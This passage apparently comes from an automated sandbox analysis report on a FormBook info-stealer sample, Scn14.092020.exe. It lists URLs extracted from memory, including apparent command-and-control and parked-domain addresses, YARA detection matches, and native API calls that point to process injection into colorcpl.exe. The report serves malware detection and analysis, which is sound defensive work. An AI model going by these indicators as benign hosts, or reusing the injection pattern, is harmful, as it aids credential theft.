          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/10_Best_Mutual_Funds.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2B
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/Anti_Wrinkle_Creams.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Ba
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/Best_Penny_Stocks.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/Cheap_Air_Tickets.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/Contact_Lens.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/Dental_Plans.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/__media__/js/trademark.php?d=panoramazoom.com&type=mng
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/d9s8/?Fzr4zDK=3AET6
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/display.cfm
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/find_a_tutor.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/px.js?ch=1
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/px.js?ch=2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: http://www.panoramazoom.com/sk-logabpstatus.php?a=QzMweEEycEZWaENUMTVFK1J3Z29lVUxpaFBhMlRuRUxaZmFpaF
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 00000005.00000002.497294283.0000000000A3A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
          Source: Scn14.092020.exeString found in binary or memory: https://www.digicert.com/CPS0
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmpString found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=panoramazoom.com&search=pre

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417987 NtReadFile,1_2_00417987
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04A99860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99840 NtDelayExecution,LdrInitializeThunk,5_2_04A99840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A999A0 NtCreateSection,LdrInitializeThunk,5_2_04A999A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A995D0 NtClose,LdrInitializeThunk,5_2_04A995D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04A99910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99540 NtReadFile,LdrInitializeThunk,5_2_04A99540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A996E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04A996E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A996D0 NtCreateKey,LdrInitializeThunk,5_2_04A996D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99610 NtEnumerateValueKey,LdrInitializeThunk,5_2_04A99610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04A99660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99A50 NtCreateFile,LdrInitializeThunk,5_2_04A99A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99650 NtQueryValueKey,LdrInitializeThunk,5_2_04A99650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99780 NtMapViewOfSection,LdrInitializeThunk,5_2_04A99780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99FE0 NtCreateMutant,LdrInitializeThunk,5_2_04A99FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99B00 NtSetValueKey,LdrInitializeThunk,5_2_04A99B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99710 NtQueryInformationToken,LdrInitializeThunk,5_2_04A99710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A998A0 NtWriteVirtualMemory,5_2_04A998A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A998F0 NtReadVirtualMemory,5_2_04A998F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99820 NtEnumerateKey,5_2_04A99820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9B040 NtSuspendThread,5_2_04A9B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A995F0 NtQueryInformationFile,5_2_04A995F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A999D0 NtCreateProcessEx,5_2_04A999D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99520 NtWaitForSingleObject,5_2_04A99520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9AD30 NtSetContextThread,5_2_04A9AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99560 NtWriteFile,5_2_04A99560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99950 NtQueueApcThread,5_2_04A99950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99A80 NtOpenDirectoryObject,5_2_04A99A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99A20 NtResumeThread,5_2_04A99A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99A00 NtProtectVirtualMemory,5_2_04A99A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99A10 NtQuerySection,5_2_04A99A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99670 NtQueryInformationProcess,5_2_04A99670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A997A0 NtUnmapViewOfSection,5_2_04A997A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A3B0 NtGetContextThread,5_2_04A9A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99730 NtQueryVirtualMemory,5_2_04A99730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A710 NtOpenProcessToken,5_2_04A9A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99760 NtOpenProcess,5_2_04A99760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99770 NtSetInformationFile,5_2_04A99770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A770 NtOpenThread,5_2_04A9A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A579E0 NtReadFile,5_2_00A579E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57930 NtCreateFile,5_2_00A57930
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57A60 NtClose,5_2_00A57A60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57B10 NtAllocateVirtualMemory,5_2_00A57B10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57987 NtReadFile,5_2_00A57987
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A579DA NtReadFile,5_2_00A579DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57B0A NtAllocateVirtualMemory,5_2_00A57B0A
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041C2A71_2_0041C2A7
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE31_2_0041ABE3
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE61_2_0041ABE6
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B4641_2_0041B464
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041BCC51_2_0041BCC5
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B6191_2_0041B619
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A820A05_2_04A820A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B220A85_2_04B220A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6B0905_2_04A6B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B228EC5_2_04B228EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B110025_2_04B11002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6841F5_2_04A6841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B1D4665_2_04B1D466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A825815_2_04A82581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6D5E05_2_04A6D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B225DD5_2_04B225DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A50D205_2_04A50D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A741205_2_04A74120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A5F9005_2_04A5F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22D075_2_04B22D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B21D555_2_04B21D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B222AE5_2_04B222AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22EF75_2_04B22EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A76E305_2_04A76E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8EBB05_2_04A8EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B21FF15_2_04B21FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B1DBD25_2_04B1DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22B285_2_04B22B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5C2A75_2_00A5C2A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A48A405_2_00A48A40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5ABE65_2_00A5ABE6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5ABE35_2_00A5ABE3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5BCC55_2_00A5BCC5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5B4645_2_00A5B464
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42D895_2_00A42D89
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42D905_2_00A42D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5B6195_2_00A5B619
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42FB05_2_00A42FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04A5B150 appears 35 times
          Source: Scn14.092020.exeStatic PE information: invalid certificate
          Source: Scn14.092020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
